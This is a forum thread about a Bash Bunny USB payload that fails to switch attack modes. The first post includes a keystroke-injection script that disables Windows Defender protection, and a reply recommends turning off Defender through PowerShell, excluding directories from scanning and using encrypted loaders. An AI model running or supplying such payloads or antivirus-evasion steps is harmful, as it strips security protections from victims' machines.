Jump to content

cant switch attackmode during payload


SamSepi46
 Share

Recommended Posts

I'm trying to write a simple payload that involves manually disabling Windows defender. I need the 1st part of the payload to use ATTACKMODE HID and the 2nd part to use ATTACKMODE HID STORAGE. however the bash bunny never seems to show up as a flash drive for that second part of the payload. What am I doing wrong? 

#STAGE ONE
LED B FAST
ATTACKMODE HID 
Q GUI r
Q DELAY 125
Q STRING windowsdefender://threat/
Q DELAY 125
Q ENTER
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q TAB
Q DELAY 1000
Q ENTER
Q DELAY 3000
Q SPACE 
Q DELAY 3000
Q ALT Y
Q DELAY 50
Q ALT F4
Q DELAY 50
#STAGE 2
LED G FAST
ATTACKMODE HID STORAGE

Link to comment
Share on other sites

Are you using a Bunny Mk1 or Mk2? Anyway, it really doesn't matter, I think it's related to firmware. There must be some issue with some parts of the Bunny features (perhaps in the ATTACKMODE script itself, I haven't looked further into it). When I run both my Mk1 and Mk2 on the latest firmware (1.7_332) the script (or variants of it), doesn't work. If I downgrade my Mk1 to the base firmware of the Mk1 (1.0_167) then the script works.... You could submit a support ticket for this to try to get it sorted.

Link to comment
Share on other sites

Just to be curious..

Why Storage ?

If you want to play with defender, go through Powershell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.
Depending on what you load, may I suggest encrypted loaders 🙂
Have fun ;)

/NX

  • Like 1
Link to comment
Share on other sites

thank you both.

Dark_Pyyro - I use the MK1, I assumed it was a firmware issue, but on the off chance it was user error (Totally possible) I wanted to make sure there wasn't anything I was missing. I used the responder payload a couple weeks back and ever since then the switches never quite worked properly. 

NoExecute - I tried to do it originally through powershell, but windows "Tamper protection" seems to block any change to the windows firewall or defender. Tamper protection seems to be the only thing preventing me from disabling defender with powershell. 

I'm interested in hearing more about Encrypted Loaders, I dont think I have ever messed with them before but if it means I can disable defender with powershell sign me up. 

Link to comment
Share on other sites

On 1/31/2022 at 3:13 PM, NoExecute said:

Just to be curious..

Why Storage ?

If you want to play with defender, go through Powershell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.
Depending on what you load, may I suggest encrypted loaders 🙂
Have fun 😉

/NX

I took your advice and it helped me.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...